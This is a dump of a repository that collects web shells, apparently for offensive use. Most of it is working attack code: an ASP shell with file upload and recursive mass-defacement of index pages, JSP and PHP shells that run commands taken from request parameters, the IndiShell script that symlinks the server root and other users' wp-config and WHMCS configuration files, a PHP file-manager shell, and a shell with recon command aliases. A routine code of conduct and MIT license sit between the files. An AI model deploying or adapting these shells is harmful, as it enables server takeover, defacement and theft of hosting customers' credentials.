Stream.Open 741 | Stream.type = 1 742 | Stream.LoadFromFile strFileName 743 | Response.BinaryWrite Stream.Read 744 | Response.Flush 745 | Stream.Close 746 | Set Stream = Nothing 747 | Case "upload" 748 | If Request.QueryString("processupload") <> "yes" Then 749 | Response.Write "
" 750 | Response.Write "" 751 | Response.Write "" 752 | Response.Write "" 753 | Response.Write "
Select a file to upload:
" 754 | Else 755 | Set Uploader = New FileUploader 756 | Uploader.Upload() 757 | If Uploader.Files.Count = 0 Then 758 | Response.Write "File(s) not uploaded." 759 | Else 760 | For Each File In Uploader.Files.Items 761 | File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\") 762 | Response.Write "File Uploaded: " & File.FileName & "
" 763 | Response.Write "Size: " & File.FileSize & " bytes
" 764 | Response.Write "Type: " & File.ContentType & "

" 765 | Response.Write "" 766 | Next 767 | End If 768 | End If 769 | Case "mass" 770 | checa = checking(cprthtml,keydec) 771 | Call hdr() 772 | Response.Write copyright & onlinehelp 773 | Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) 774 | On Error Resume Next 775 | Set MonRep = ObjFSO.GetFolder(caminhodomass) 776 | Set ColFolders = MonRep.SubFolders 777 | for each folderItem in ColFolders 778 | destino1 = folderItem.path & "\index.htm" 779 | destino2 = folderItem.path & "\index.html" 780 | destino3 = folderItem.path & "\index.asp" 781 | destino4 = folderItem.path & "\index.cfm" 782 | destino5 = folderItem.path & "\index.php" 783 | destino6 = folderItem.path & "\default.htm" 784 | destino7 = folderItem.path & "\default.html" 785 | destino8 = folderItem.path & "\default.asp" 786 | destino9 = folderItem.path & "\default.cfm" 787 | destino10 = folderItem.path & "\default.php" 788 | MeuArquivo.Copy(destino1) 789 | MeuArquivo.Copy(destino2) 790 | MeuArquivo.Copy(destino3) 791 | MeuArquivo.Copy(destino4) 792 | MeuArquivo.Copy(destino5) 793 | MeuArquivo.Copy(destino6) 794 | MeuArquivo.Copy(destino7) 795 | MeuArquivo.Copy(destino8) 796 | MeuArquivo.Copy(destino9) 797 | MeuArquivo.Copy(destino10) 798 | Response.Write "" 799 | If Err.Number = 0 Then 800 | Response.Write "" 801 | Else 802 | Response.Write "
<DIR> " & folderItem.path & "  DONE!
  " & UCase(Err.Description) & "
" 803 | End If 804 | Err.Number = 0 805 | Response.Flush 806 | If metodo = "brute" Then 807 | Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) 808 | End If 809 | next 810 | End Sub 811 | Sub brutemass(caminho,massaction) 812 | If massaction = "test" Then 813 | On Error Resume Next 814 | Set MonRep = ObjFSO.GetFolder(caminho) 815 | Set ColFolders = MonRep.SubFolders 816 | Set ColFiles0 = MonRep.Files 817 | for each folderItem in ColFolders 818 | Set TotalFolders = ObjFSO.GetFolder(folderItem.path) 819 | Set EachFolder = TotalFolders.SubFolders 820 | Response.Write "" 821 | maindestino = folderItem.path & "\" 822 | MeuArquivo.Copy(maindestino) 823 | Response.Write "" 824 | If Err.Number = 0 Then 825 | Response.Write "" 826 | Else 827 | Response.Write "" 828 | End If 829 | Err.Number = 0 830 | Response.Flush 831 | If EachFolder.count > 0 Then 832 | masscontador = 0 833 | for each subpasta in EachFolder 834 | masscontador = masscontador + 1 835 | destino = subpasta.path & "\" 836 | If masscontador = 1 Then 837 | destinofinal = destino 838 | pathfinal = subpasta.path 839 | Err.Number = 0 840 | MeuArquivo.Copy(destinofinal) 841 | Response.Write "" 842 | If Err.Number = 0 Then 843 | Response.Write "" 844 | Else 845 | Response.Write "" 846 | End If 847 | Err.Number = 0 848 | Response.Flush 849 | Else 850 | MeuArquivo.Copy(destino) 851 | Response.Write "" 852 | If Err.Number = 0 Then 853 | Response.Write "" 854 | Else 855 | Response.Write "" 856 | End If 857 | Err.Number = 0 858 | Response.Flush 859 | End If 860 | next 861 | masscontador = 0 862 | End If 863 | Response.Write "
<DIR> " & maindestino & "  Acesso Permitido
  " & UCase(Err.Description) & "
<DIR> " & showobj(pathfinal) & "  Acesso Permitido
  " & UCase(Err.Description) & "
<DIR> " & showobj(subpasta.path) & "  Acesso Permitido
  " & UCase(Err.Description) & "

" 864 | Call brutemass(folderItem.path & "\","test") 865 | next 866 | Set MonRep = Nothing 867 | Set ColFolders = Nothing 868 | Set ColFiles0 = Nothing 869 | Else 870 | If Request.Form.Count = 0 Then 871 | Response.Write "

Brute: Test and Deface root and sub directories.

" 872 | Response.Write "Single: Test and deface only root directories.

" 873 | Response.Write "" 874 | Response.Write "" 875 | Response.Write "
Deface Code:
" 876 | Response.Write "
" 877 | Response.Write "Brute   " 878 | Response.Write "Single
" 879 | Response.Write "
" 880 | Response.Write "" 881 | Else 882 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 883 | patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) 884 | arquivomassdfc = patharquivotxt & "teste.txt" 885 | Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) 886 | vetordelinhas = Split(Request.Form("content"),VbCrLf) 887 | For i = 0 To UBound(vetordelinhas) 888 | Arquivotxt.WriteLine(vetordelinhas(i)) 889 | Next 890 | Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) 891 | 892 | If Request.Form("massopt") = "single" Then 893 | Call themassdeface(caminho,"single",ObjFSO,MeuArquivo) 894 | ElseIf Request.Form("massopt") = "brute" Then 895 | Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) 896 | End If 897 | End If 898 | End If 899 | End Sub 900 | If Trim(Request.QueryString("massact")) = "test" Then 901 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 902 | patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) 903 | arquivo = patharquivotxt & "_vti_cnf.log" 904 | Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True) 905 | Set MeuArquivo = ObjFSO.GetFile(arquivo) 906 | Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test") 907 | ElseIf Trim(Request.QueryString("massact")) = "dfc" Then 908 | Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc") 909 | End If 910 | Case "fcopy" 911 | If Trim(Request.Form("submit1")) = "Copy" Then 912 | mptpath=Trim(Request.Form("path")) 913 | mptdest=Trim(Request.Form("cf")) 914 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 915 | isl = "" 916 | if Trim(Request.Form("islem"))="kopyala" then 917 | objFSO.CopyFolder mptpath,mptdest 918 | isl="Copied.." 919 | elseif Trim(Request.Form("islem"))="tasi" then 920 | objFSO.MoveFolder mptpath,mptdest 921 | isl="moved.." 922 | end if 923 | 924 | response.Write "Command: "&isl 925 | response.Write "
File From: " & mptpath & "
Copy to: " & mptdest 926 | response.Write "
" 927 | Else 928 | Response.Write "
" 929 | Response.Write "
Copy Path : " 930 | Response.Write "" 931 | Response.Write "" 932 | response.Write "" 933 | Response.Write "
" 934 | response.Write "Copy" 935 | response.Write "Move" 936 | response.Write "
" 937 | response.Write "
" 938 | End IF 939 | 940 | Case "filecopy" 941 | If Trim(Request.Form("submit1")) = "Copy" Then 942 | mptpath=Trim(Request.Form("path")) 943 | mptdest=Trim(Request.Form("cf")) 944 | Set ObjFSO = CreateObject("Scripting.FileSystemObject") 945 | isl = "" 946 | if Trim(Request.Form("islem"))="kopyala" then 947 | objFSO.CopyFile mptpath,mptdest 948 | isl="Copy.." 949 | elseif Trim(Request.Form("islem"))="tasi" then 950 | objFSO.MoveFile mptpath,mptdest 951 | isl="move.." 952 | end if 953 | 954 | response.Write "Command: "&isl 955 | response.Write "
File From: " & mptpath & "
Copy to: " & mptdest 956 | response.Write "
" 957 | Else 958 | Response.Write "
" 959 | Response.Write "
Copy Path : " 960 | Response.Write "" 961 | Response.Write "" 962 | response.Write "" 963 | Response.Write "
" 964 | response.Write "Copy" 965 | response.Write "Move" 966 | response.Write "
" 967 | response.Write "
" 968 | End IF 969 | 970 | 971 | Case "search" 972 | If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then 973 | showdisks=FALSE 974 | status5=Trim(Request.Form("status")) 975 | if status5="" then status5=Trim(Request.QueryString("status")) 976 | SELECT CASE status5 977 | 978 | CASE "5" 979 | Response.Write "
"& Trim(Request.QueryString("path")) &"

" 980 | Response.Write "
" 981 | set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1) 982 | Response.Write "
"&Server.HTMLEncode(f.readAll)&"
" 983 | if err.number=62 then Response.Write "":Response.End 984 | 985 | 986 | 987 | CASE "7": 988 | Response.Write "Tables

" 989 | Set objConn = Server.CreateObject("ADODB.Connection") 990 | Set objADOX = Server.CreateObject("ADOX.Catalog") 991 | objConn.Provider = "Microsoft.Jet.Oledb.4.0" 992 | objConn.ConnectionString = Trim(Request.QueryString("path")) 993 | objConn.Open 994 | objADOX.ActiveConnection = objConn 995 | 996 | For Each table in objADOX.Tables 997 | If table.Type = "TABLE" Then 998 | Response.Write "4 "&table.Name&"
" 999 | End If 1000 | Next 1001 | 1002 | CASE "8": 1003 | table=Trim(Request.QueryString("table")) 1004 | Response.Write "

Table Name: " & table & "




" 1005 | Set objConn = Server.CreateObject("ADODB.Connection") 1006 | Set objRcs = Server.CreateObject("ADODB.RecordSet") 1007 | objConn.Provider = "Microsoft.Jet.Oledb.4.0" 1008 | objConn.ConnectionString = Trim(Request.QueryString("path")) 1009 | objConn.Open 1010 | objRcs.Open table,objConn, adOpenKeyset , , adCmdText 1011 | 1012 | Response.Write "" 1013 | for i=0 to objRcs.Fields.count-1 1014 | Response.Write "" 1015 | next 1016 | Response.Write "" 1017 | do while not objRcs.EOF 1018 | Response.Write "" 1019 | for i=0 to objRcs.Fields.count-1 1020 | Response.Write "" 1021 | next 1022 | Response.Write "" 1023 | objRcs.MoveNext 1024 | loop 1025 | Response.Write "
   "&objRcs.Fields(i).Name&"   
"&objRcs.Fields(i).Value&" 

" 1026 | 1027 | 1028 | case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama")) 1029 | 1030 | END SELECT 1031 | 1032 | Else 1033 | showdisks=FALSE 1034 | checa = checking(cprthtml,keydec) 1035 | Call hdr() 1036 | Response.Write "
" 1037 | Response.Write "
File Ext: " 1038 | Response.Write " " 1039 | Response.Write "" 1040 | Response.Write "
" 1041 | End IF 1042 | 1043 | 1044 | 1045 | Case "sqlserver" 1046 | If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then 1047 | showdisks=FALSE 1048 | status5=Trim(Request.Form("status")) 1049 | if status5="" then status5=Trim(Request.QueryString("status")) 1050 | SELECT CASE status5 1051 | 1052 | 1053 | CASE "7": 1054 | Response.Write "Tables

" 1055 | Set objConn = Server.CreateObject("ADODB.Connection") 1056 | Set objADOX = Server.CreateObject("ADOX.Catalog") 1057 | objConn.Provider = "Microsoft.Jet.Oledb.4.0" 1058 | objConn.ConnectionString = Trim(Request.QueryString("path")) 1059 | objConn.Open 1060 | objADOX.ActiveConnection = objConn 1061 | 1062 | For Each table in objADOX.Tables 1063 | If table.Type = "TABLE" Then 1064 | Response.Write "4 "&table.Name&"
" 1065 | End If 1066 | Next 1067 | 1068 | CASE "8": 1069 | table=Trim(Request.QueryString("table")) 1070 | Response.Write "

Table Name: " & table & "




" 1071 | Set objConn = Server.CreateObject("ADODB.Connection") 1072 | Set objRcs = Server.CreateObject("ADODB.RecordSet") 1073 | objConn.Provider = "Microsoft.Jet.Oledb.4.0" 1074 | objConn.ConnectionString = Trim(Request.QueryString("path")) 1075 | objConn.Open 1076 | objRcs.Open table,objConn, adOpenKeyset , , adCmdText 1077 | 1078 | Response.Write "" 1079 | for i=0 to objRcs.Fields.count-1 1080 | Response.Write "" 1081 | next 1082 | Response.Write "" 1083 | do while not objRcs.EOF 1084 | Response.Write "" 1085 | for i=0 to objRcs.Fields.count-1 1086 | Response.Write "" 1087 | next 1088 | Response.Write "" 1089 | objRcs.MoveNext 1090 | loop 1091 | Response.Write "
   "&objRcs.Fields(i).Name&"   
"&objRcs.Fields(i).Value&" 

" 1092 | 1093 | 1094 | END SELECT 1095 | 1096 | Else 1097 | showdisks=FALSE 1098 | checa = checking(cprthtml,keydec) 1099 | Call hdr() 1100 | 1101 | Response.Write "
" 1102 | Response.Write "
SQL Server connection string:
" 1103 | Response.Write "" 1104 | Response.Write "
" 1105 | response.Write "" 1106 | Response.Write "
" 1107 | response.Write "
" 1108 | 1109 | End IF 1110 | 1111 | 1112 | 1113 | Case "about" 1114 | showdisks=FALSE 1115 | checa = checking(cprthtml,keydec) 1116 | Call hdr() 1117 | response.Write "


Coded By S3rver" 1118 | response.Write "

" 1119 | response.Write "WebSite: :)" 1120 | response.Write "
" 1121 | response.Write "E-Mail: Pouya.S3rver@Gmail.Com" 1122 | response.Write "

" 1123 | response.Write "Hackers, Crackers, Programmers Forever!" 1124 | 1125 | 1126 | Case Else 1127 | checa = checking(cprthtml,keydec) 1128 | Call hdr() 1129 | Response.Write copyright & onlinehelp 1130 | Call showcontent() 1131 | End Select 1132 | If Err.Number <> 0 Then 1133 | Response.Write "
ERRO: " & Err.Number & "

" & UCase(Err.Description) & "
Acesse denied." 1134 | End If 1135 | Response.Write endcode 1136 | 1137 | if showdisks then 1138 | 1139 | %> 1140 | 1141 | 1147 | 1148 | 1149 | <% 1150 | 1151 | 1152 | Set objFSO = Server.CreateObject("Scripting.FileSystemObject") 1153 | 1154 | Response.Write "


" 1155 | for each drive_ in objFSO.Drives 1156 | Response.Write "" 1163 | next 1164 | Response.Write "" 1167 | Response.Write "
Drives
" 1157 | Response.write ";" 1158 | if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]" 1159 | if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]" 1160 | if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]" 1161 | if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]" 1162 | Response.Write "
" 1165 | Response.write "H Local Path" 1166 | Response.Write "

" 1168 | end if 1169 | %> 1170 | 1171 | 1172 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation. 6 | 7 | ## Our Standards 8 | 9 | Examples of behavior that contributes to creating a positive environment include: 10 | 11 | * Using welcoming and inclusive language 12 | * Being respectful of differing viewpoints and experiences 13 | * Gracefully accepting constructive criticism 14 | * Focusing on what is best for the community 15 | * Showing empathy towards other community members 16 | 17 | Examples of unacceptable behavior by participants include: 18 | 19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances 20 | * Trolling, insulting/derogatory comments, and personal or political attacks 21 | * Public or private harassment 22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission 23 | * Other conduct which could reasonably be considered inappropriate in a professional setting 24 | 25 | ## Our Responsibilities 26 | 27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. 28 | 29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. 30 | 31 | ## Scope 32 | 33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 34 | 35 | ## Enforcement 36 | 37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project lead maintainer at thebinitghimire@gmail.com. All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 38 | 39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. 40 | 41 | ## Attribution 42 | 43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 44 | 45 | [homepage]: https://www.contributor-covenant.org 46 | 47 | For answers to common questions about this code of conduct, see https://www.contributor-covenant.org/faq 48 | -------------------------------------------------------------------------------- /JSP/shell.jsp: -------------------------------------------------------------------------------- 1 | <%-- Source: https://gist.github.com/ErosLever/7445a3cfaaf80f1f5a53 --%> 2 | <%-- For more JSP shells, visit the JSP directory at https://github.com/TheBinitGhimire/Web-Shells! --%> 3 |
4 | 5 | 6 |
<%! 7 | public String esc(String str){ 8 | StringBuffer sb = new StringBuffer(); 9 | for(char c : str.toCharArray()) 10 | if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) 11 | sb.append( c ); 12 | else 13 | sb.append("&#"+(int)(c&0xff)+";"); 14 | return sb.toString(); 15 | } %><% 16 | String cmd = request.getParameter("cmd"); 17 | if ( cmd != null) { 18 | out.println("
Command was: "+esc(cmd)+"\n");
19 | 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
20 | 	String line = in.readLine();
21 | 	while( line != null ){
22 | 		out.println(esc(line));
23 | 		line = in.readLine();
24 | 	}
25 | 	out.println("
"); 26 | } %> 27 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Binit Ghimire 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /PHP/TwemlowsShell.php: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /PHP/TwemlowsWebShell.php: -------------------------------------------------------------------------------- 1 | 26 | -------------------------------------------------------------------------------- /PHP/cmd.php: -------------------------------------------------------------------------------- 1 | "; 4 | $cmd = ($_REQUEST['cmd']); 5 | system($cmd); 6 | echo ""; 7 | die; 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /PHP/configkillerionkros.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | --==[[Configuration File Killer By Ion Kros]]==-- 9 | 10 | 11 | 102 | '; ?> 121 | 122 | 123 | 128 | 129 | 130 | 131 |

132 | --==[[ Configuration File Killer By Team IndiShell ]]==--
133 | 134 |
137 | 138 | #############################################################################################################################################################
-==[[Greetz to]]==--
Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell
cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk
Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL
139 | 140 | --==[[Dedicated to]]==-- 141 |
# SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #
--==[[Interface Desgined By]]==--
Deepika Kaushik
142 | ############################################################################################################################################################# 143 | 144 |
145 | 146 | 147 | '; 148 | 149 | ?> 150 |

Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_
151 |
The button given below generates php.ini file :)

152 |

153 |
The button given below extract usernames for symlink :)

154 |

155 | 156 | open this link in new tab to run PHP.INI"; 164 | echo $link; 165 | 166 | } 167 | 168 | 169 | 170 | ?> 171 | 172 | 173 |
176 |

184 |
185 | 186 | "; 189 | if(isset($_POST['su'])) 190 | { 191 | mkdir('Indishell',0777); 192 | $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; 193 | $g = fopen('Indishell/.htaccess','w'); 194 | fwrite($g,$rr); 195 | $indishell = symlink("/","Indishell/root"); 196 | $rt=" OwN3d"; 197 | echo "Bhai ji .... check link given below for / folder symlink
$rt"; 198 | 199 | $dir=mkdir('INDISHELL',0777); 200 | $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; 201 | $f = fopen('INDISHELL/.htaccess','w'); 202 | 203 | fwrite($f,$r); 204 | $consym="configuration files"; 205 | echo "
The link given below for configuration file symlink...open it, once processing finish
$consym"; 206 | 207 | $usr=explode("\n",$_POST['user']); 208 | $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php"); 209 | foreach($usr as $uss ) 210 | { 211 | $us=trim($uss); 212 | 213 | foreach($configuration as $c) 214 | { 215 | $rs="/home/".$us."/public_html/".$c; 216 | $r="INDISHELL/".$us.$c; 217 | symlink($rs,$r); 218 | 219 | } 220 | 221 | } 222 | 223 | 224 | } 225 | 226 | 227 | 228 | ?> 229 | -------------------------------------------------------------------------------- /PHP/mini.php: -------------------------------------------------------------------------------- 1 | $value){ 7 | $_POST[$key] = stripslashes($value); 8 | } 9 | } 10 | echo ' 11 | 12 | 13 | 14 | Mini Shell 15 | 53 | 54 | 55 |

56 | Mini Shell 57 |

58 | 59 | '; 98 | if(isset($_GET['filesrc'])){ 99 | echo "
Direktori : '; 60 | if(isset($_GET['path'])){ 61 | $path = $_GET['path']; 62 | }else{ 63 | $path = getcwd(); 64 | } 65 | 66 | $path = str_replace('\\','/',$path); 67 | $paths = explode('/',$path); 68 | 69 | foreach($paths as $id=>$pat){ 70 | if($pat == '' && $id == 0){ 71 | $a = true; 72 | echo '/'; 73 | continue; 74 | } 75 | if($pat == '') continue; 76 | echo ''.$pat.'/'; 82 | } 83 | echo '
'; 84 | if(isset($_FILES['file'])){ 85 | if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ 86 | 87 | echo 'File Ter-Upload :*
'; 88 | }else{ 89 | echo 'Upload gagal, Servernya kek 90 |
'; 91 | } 92 | } 93 | echo '
94 | Upload File : 95 | 96 |
97 |
Current File : "; 100 | echo $_GET['filesrc']; 101 | echo '

'; 102 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); 103 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 104 | echo '
'.$_POST['path'].'

'; 105 | if($_POST['opt'] == 'chmod'){ 106 | if(isset($_POST['perm'])){ 107 | if(chmod($_POST['path'],$_POST['perm'])){ 108 | echo 'Change Permission Done.
'; 109 | }else{ 110 | echo 'Change Permission Error.
'; 111 | } 112 | } 113 | echo '
114 | Permission : 115 | 116 | 117 | 118 |
'; 119 | }elseif($_POST['opt'] == 'rename'){ 120 | if(isset($_POST['newname'])){ 121 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ 122 | echo 'Change Name Done.
'; 123 | }else{ 124 | echo 'Change Name Error.
'; 125 | } 126 | $_POST['name'] = $_POST['newname']; 127 | } 128 | echo '
129 | New Name : 130 | 131 | 132 | 133 |
'; 134 | }elseif($_POST['opt'] == 'edit'){ 135 | if(isset($_POST['src'])){ 136 | $fp = fopen($_POST['path'],'w'); 137 | if(fwrite($fp,$_POST['src'])){ 138 | echo 'Edit File Done ~_^.
'; 139 | }else{ 140 | echo 'Edit File Error ~_~.
'; 141 | } 142 | fclose($fp); 143 | } 144 | echo '
145 |
146 | 147 | 148 | 149 |
'; 150 | } 151 | echo '
'; 152 | }else{ 153 | echo '
'; 154 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 155 | if($_POST['type'] == 'dir'){ 156 | if(rmdir($_POST['path'])){ 157 | echo 'Delete Dir Done.
'; 158 | }else{ 159 | echo 'Delete Dir Error.
'; 160 | } 161 | }elseif($_POST['type'] == 'file'){ 162 | if(unlink($_POST['path'])){ 163 | echo 'Delete File Done.
'; 164 | }else{ 165 | echo 'Delete File Error.
'; 166 | } 167 | } 168 | } 169 | echo '
'; 170 | $scandir = scandir($path); 171 | echo '
172 | 173 | 174 | 175 | 176 | 177 | '; 178 | 179 | foreach($scandir as $dir){ 180 | if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; 181 | echo " 182 | 183 | 184 | 191 | 203 | "; 204 | } 205 | echo ''; 206 | foreach($scandir as $file){ 207 | if(!is_file("$path/$file")) continue; 208 | $size = filesize("$path/$file")/1024; 209 | $size = round($size,3); 210 | if($size >= 1024){ 211 | $size = round($size/1024,2).' MB'; 212 | }else{ 213 | $size = $size.' KB'; 214 | 215 | } 216 | 217 | echo " 218 | 219 | 220 | 226 | 239 | "; 240 | } 241 | echo '
Name
Size
Permissions
Options
$dir
--
"; 185 | if(is_writable("$path/$dir")) echo ''; 186 | elseif(!is_readable("$path/$dir")) echo ''; 187 | echo perms("$path/$dir"); 188 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; 189 | 190 | echo "
192 | 198 | 199 | 200 | 201 | \" /> 202 |
$file
".$size."
"; 221 | if(is_writable("$path/$file")) echo ''; 222 | elseif(!is_readable("$path/$file")) echo ''; 223 | echo perms("$path/$file"); 224 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; 225 | echo "
227 | 234 | 235 | 236 | 237 | \" /> 238 |
242 |
'; 243 | } 244 | echo '

Zerion Mini Shell 1.0
245 | 246 | '; 247 | function perms($file){ 248 | $perms = fileperms($file); 249 | 250 | if (($perms & 0xC000) == 0xC000) { 251 | 252 | // Socket 253 | $info = 's'; 254 | } elseif (($perms & 0xA000) == 0xA000) { 255 | // Symbolic Link 256 | $info = 'l'; 257 | } elseif (($perms & 0x8000) == 0x8000) { 258 | // Regular 259 | $info = '-'; 260 | } elseif (($perms & 0x6000) == 0x6000) { 261 | // Block special 262 | $info = 'b'; 263 | } elseif (($perms & 0x4000) == 0x4000) { 264 | // Directory 265 | $info = 'd'; 266 | } elseif (($perms & 0x2000) == 0x2000) { 267 | // Character special 268 | $info = 'c'; 269 | } elseif (($perms & 0x1000) == 0x1000) { 270 | // FIFO pipe 271 | $info = 'p'; 272 | } else { 273 | // Unknown 274 | $info = 'u'; 275 | } 276 | 277 | // Owner 278 | $info .= (($perms & 0x0100) ? 'r' : '-'); 279 | $info .= (($perms & 0x0080) ? 'w' : '-'); 280 | $info .= (($perms & 0x0040) ? 281 | (($perms & 0x0800) ? 's' : 'x' ) : 282 | (($perms & 0x0800) ? 'S' : '-')); 283 | 284 | 285 | // Group 286 | $info .= (($perms & 0x0020) ? 'r' : '-'); 287 | $info .= (($perms & 0x0010) ? 'w' : '-'); 288 | $info .= (($perms & 0x0008) ? 289 | (($perms & 0x0400) ? 's' : 'x' ) : 290 | (($perms & 0x0400) ? 'S' : '-')); 291 | 292 | // World 293 | $info .= (($perms & 0x0004) ? 'r' : '-'); 294 | $info .= (($perms & 0x0002) ? 'w' : '-'); 295 | 296 | $info .= (($perms & 0x0001) ? 297 | (($perms & 0x0200) ? 't' : 'x' ) : 298 | (($perms & 0x0200) ? 'T' : '-')); 299 | 300 | return $info; 301 | } 302 | ?> 303 | -------------------------------------------------------------------------------- /PHP/punk-nopass.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | PuNkHoLic shell 4 | 5 | 6 | 43 | 44 | 45 | 46 | "dir", 75 | "Find index.php in current dir" => "dir /s /w /b index.php", 76 | "Find *config*.php in current dir" => "dir /s /w /b *config*.php", 77 | "Show active connections" => "netstat -an", 78 | "Show running services" => "net start", 79 | "User accounts" => "net user", 80 | "Show computers" => "net view", 81 | "ARP Table" => "arp -a", 82 | "IP Configuration" => "ipconfig /all" 83 | ); 84 | } 85 | else{ 86 | $aliases = array( 87 | 